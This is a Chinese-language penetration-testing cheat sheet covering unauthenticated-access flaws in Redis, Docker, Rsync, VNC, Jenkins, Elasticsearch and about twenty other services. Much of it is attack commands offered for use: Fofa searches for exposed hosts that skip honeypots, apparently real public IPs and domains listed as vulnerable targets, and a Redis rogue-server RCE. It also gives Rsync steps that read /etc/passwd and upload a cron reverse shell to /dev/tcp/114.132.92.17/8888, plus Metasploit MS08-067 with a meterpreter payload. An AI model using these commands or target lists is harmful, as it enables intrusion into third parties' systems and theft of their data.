未授权访问漏洞集合

Redis未授权访问漏洞

进入vulhub目录启动靶机

进⼊⽬录：cd /vulhub-master/redis/4-unacc
启动：docker-compose up -d
检查：docker ps

在Kali上安装redis程序

#安装redis
apt-get install redis
#redis链接
redis-cli -h 124.221.58.83 -p 6379
#redis常⻅命令
（1）查看信息：info
（2）删除所有数据库内容：flushall
（3）刷新数据库：flushdb
（4）看所有键：KEYS *，使⽤select num可以查看键值数据。
（5）设置变量：set test "whoami"
（6）config set dir dirpath 设置路径等配置
（7）config get dir/dbfilename 获取路径及数据配置信息
（8）save保存
（9）get 变量，查看变量名称

可以直接连接执⾏命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项⽬

git clone https://github.com/n0b0dyCN/redis-rogue-server

使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境，交互时输⼊ i 键会获取Shell环境

python3 redis-rogue-server.py --rhost 124.221.58.83 --lhost 124.221.58.83

第一次开启环境可能会报错再执行一次就可以成功进入

i是正向反弹 r是

MongoDB未授权访问漏洞

在云服务器上执行以下命令搭建起MongoDB的漏洞环境..

拉取镜像：docker pull mongo
启动容器：docker run -d -p 27017:27017 --name mongodb mongo
查看容器：docker ps -a

使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞.

nmap -p 27017 --script mongodb-info 8.155.7.173

也可尝试使⽤MSF中的模块进⾏漏洞测试....不需要认证即可直接连接...

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 172.16.3.243
set threads 15
exploit

即存在未授权访问漏洞使⽤Navicat进⾏连接...

Memcached未未授权访问漏洞

下载Memcached程序并执⾏以下命令..启动Memcached漏洞环境

#Memcached程序下载
https://www.runoob.com/memcached/window-install-memcached.html
#执⾏命令
memcached.exe -d install
memcached.exe -d start

要使用管理员身份运行cmd

使⽤Telnet程序探测⽬标的11211端⼝...

#Telnet探测
telnet 172.16.3.243 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容，造成敏感信息泄露

使⽤Nmap程序的脚本进⾏漏洞扫描....

nmap -p 11211 --script memcached-info 172.16.3.243

Zookeeper未授权访问漏洞

使⽤以下Fofa语法搜索资产信息....

port="2181" && "Zookeeper" && country="US"

在Kali中使⽤以下命令进⾏未授权访问漏洞测试

echo envi | nc ip 35.162.110.1 2181

可使⽤Zookeeper可视化管理⼯具进⾏连接....

#⼯具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

Jenkins未授权访问漏洞

使⽤以下fofa语法进⾏产品搜索..

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在打开的URL中...点击 Manage Jenkins --> Scritp Console 在执⾏以下命令...

#执⾏命令
println "whoami" .execute().text

Jupyter NoteBook未授权访问漏洞

通过以下fofa语法进⾏产品搜索....或使⽤vulhub启动靶场.

#fofa语法
"Jupyter Notebook" && port="8888" && "terminals"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

如果存在未授权访问漏洞则直接访问 http://IP:8888 会直接跳到web管理界⾯，不需要输⼊密码。

从 New -> Terminal 新建⼀个终端，通过新建的终端可执⾏任意命令

Elasticsearch未授权访问漏洞

使⽤以下Fofa语法进⾏Elasticsearch产品搜索...

"Elasticsearch" && port="9200"

存在未授权访问则直接进⼊到信息⻚⾯....不需要输⼊⽤户密码登陆

可按照上⾯查看节点信息等

http://121.37.170.50:9200/version

Kibana未授权访问漏洞

使⽤以下Fofa语句搜索Kibana产品...并打开⻚⾯

"kibana" && port="5601"

直接访问Kibana的⻚⾯且⽆需账号密码可以登陆进⼊界⾯

Docker Remote API未授权访问漏洞

使⽤以下Fofa语句对Docker产品进⾏搜索

port="2375" && "docker"

直接使⽤浏览器访问以下路径...

apt install docker-cli

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
#eg
http://35.86.135.136:2375/info
http://47.121.212.195:2375/info

使⽤-H参数连接⽬标主机的docker，使⽤ps命令查询⽬标系统运⾏的镜像

docker -H tcp://130.61.230.9:2375 ps
docker -H tcp://130.61.230.9:2375 version
docker -H tcp://130.61.230.9:2375 exec -it 1f4 /bin/bash
操作思路：
docker pull 下载有Docker逃逸的容器下来
docker逃逸间接获取安装docker主机控制权限

Kubernetes Api Server未授权访问漏洞

使⽤以下Fofa语法搜索Kubernetes产品....

port="8080" && app="Kubernetes"

在打开的⽹⻚中直接访问 8080 端⼝会返回可⽤的 API 列表

Hadoop未授权访问漏洞

使⽤以下FoFA语法进⾏Hadoop产品的搜索

port="8088" && app="Hadoop"

开启⻚⾯直接访问不经过⽤户密码验证....

ActiveMQ未授权访问漏洞

使⽤以下Fofa语法搜索产品...

body="ActiveMQ" && port="8161"

ActiveMQ默认使⽤8161端⼝，默认⽤户名和密码是 admin/admin ，在打开的⻚⾯输⼊

#⽤户登陆
http://43.255.231.186:8161/admin/
http://47.104.74.168:8161/admin/
http://123.60.156.191:8161/admin/

admin admin 登录成功

RabbitMQ未授权访问漏洞

使⽤以下Fofa语法对RabbitMQ产品进⾏搜索...

port="15672" 
port="15692" 
port="25672"

在打开的⻚⾯中可输⼊默认的账号和密码进⾏登陆

默认账号密码都是guest
http://x.x.x.x:15672
http://x.x.x.x:25672
http://x.x.x.x:15692
#eg
http://bzgx.yuyiying.com:15672/
http://47.94.4.84:15672
https://114.119.175.25:25672/#/

Springboot Actuator未授权访问漏洞

使⽤以下Fofa语句搜索资产并打开⻚⾯访问

#Fofa语法
icon_hash="116323821"
#eg
http://2.sureyong.com:9999/#/

当 web 应⽤程序出现 4xx、5xx 错误时显示类似以下⻚⾯就能确定当前 web 应⽤是使⽤了

springboot 框架....

拼接以下路径查看泄露的数据..

访问/trace端点获取基本的 HTTP 请求跟踪信息（时间戳、HTTP 头等），如果存在登录⽤户的操作
请求，可以伪造cookie进⾏登录。
访问/env端点获取全部环境属性，由于 actuator 会监控站点 mysql、mangodb 之类的数据库服
务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公⽹，那么造
成的危害是巨⼤的。
git 项⽬地址泄露，这个⼀般是在/health 路径，⽐如如下站点，访问其 health 路径可探测到站
点 git 项⽬地址。

FTP未授权访问漏洞(匿名登陆)

对⽬标环境在资源管理器中⽤以下格式访问...如果该服务器开启了匿名登陆，则可直接进⾏内容查看

ftp://ip:port/

本机开启ftp匿名访问前后对比

开启前

开启后

JBoss未授权访问漏洞

使⽤以下语法搜索Jboss产品并打开其⻚⾯....

title="Welcome to JBoss"

拼接以下路径且⽆需认证直接进⼊控制⻚⾯

#拼接路径
http://ip:port/jmx-console/
#eg
http://177.67.128.116//jmx-console/
http://117.193.144.108:8080/jmx-console/
http://119.8.196.187:8080/jmx-console/

admin admin弱密码登录

Ldap未授权访问漏洞

使⽤以下Fofa语法搜索使⽤ldap服务的产品....并通过Ldapadmin可视化⼯具做连接验证

#Fofa语法
port="389"
#Ldapadmin⼯具
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

启动⼯具并测试存在未授权的LDAP服务...成功如下

连接⽬标LDAP服务并查看其内容

Rsync未授权访问漏洞

在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场！！！

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d

可使⽤Nmap扫描该端⼝是否开启服务，还可以使⽤Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测...

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules_list

使⽤命令进⾏链接并读取⽂件....

rsync rsync://124.221.58.83:873/
rsync rsync://124.221.58.83:873/src/

对系统中的敏感⽂件下载操作.... /etc/passwd

rsync rsync://8.155.7.133:873/src/etc/passwd 
rsync rsync://8.155.7.133:873/src/etc/passwd /var/www/html

上传⽂件...如果有相应的jsp/asp/php环境可以写⼀句话以phpinfo为例...

echo "1" >1.txt
ls
rsync ./1.txt rsync://8.155.7.133:873/src/  
rsync rsync://8.155.7.133:873/src/

反弹shell...在此可利⽤定时任务cron来反弹获取shell

查看定时任务
rsync rsync://8.155.7.133/src/etc/crontab
将定时任务下载下来
rsync rsync://8.155.7.133/src/etc/crontab /var/www/html

创建shell文件
echo 1>1.txt
  
vim 1.txt
  
#!/bin/bash
/bin/bash -i >& /dev/tcp/114.132.92.17/8888 0>&1

mv 1.txt shell
cat shell
授权shell文件
chmod 777 shell
上传shell 至靶机
rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
攻击机开启nc监听响应端口

下载的定时任务文件

创建shell文件

上传shell至靶机

攻击机开启nc监听

VNC未授权访问漏洞

使⽤以下语句在Fofa上进⾏资产收集

(port="5900") && (is_honeypot=false && is_fraud=false)

可通过MSF中的模块进⾏检测与漏洞利⽤

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后，直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

VNC链接验证

vncviewer ipaddress

Dubbo未授权访问漏洞

使⽤以下语句在Fofa上进⾏资产收集

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

使⽤Telnet程序直接进⾏链接测试

telent IP port

NSF共享⽬录未授权访问

使⽤以下语句在Fofa上进⾏资产收集

"nfs"

执⾏命令进⾏漏洞复现

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e 192.168.126.130
#挂载相应共享⽬录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载⽬录
umount /mnt

Druid未授权访问漏洞

步骤⼀：使⽤以下语句在Fofa与Google上进⾏资产收集....

# Fofa
title="Druid Stat Index"
# PHPINFO⻚⾯
inurl:phpinfo.php intitle:phpinfo()
info.php test.php
 
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index"

对访问到的站点查看

Druid批量扫描脚本...

https://github.com/MzzdToT/CVE-2021-34045

CouchDB未授权访问

使⽤以下语句在Fofa上进⾏资产收集....或开启Vulhub靶场进⾏操作

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

执⾏未授权访问测试命令

curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config

反弹Shell参考

https://blog.csdn.net/qq_45746681/article/details/108933389

RTSP

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

rtsp://admin:admin@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1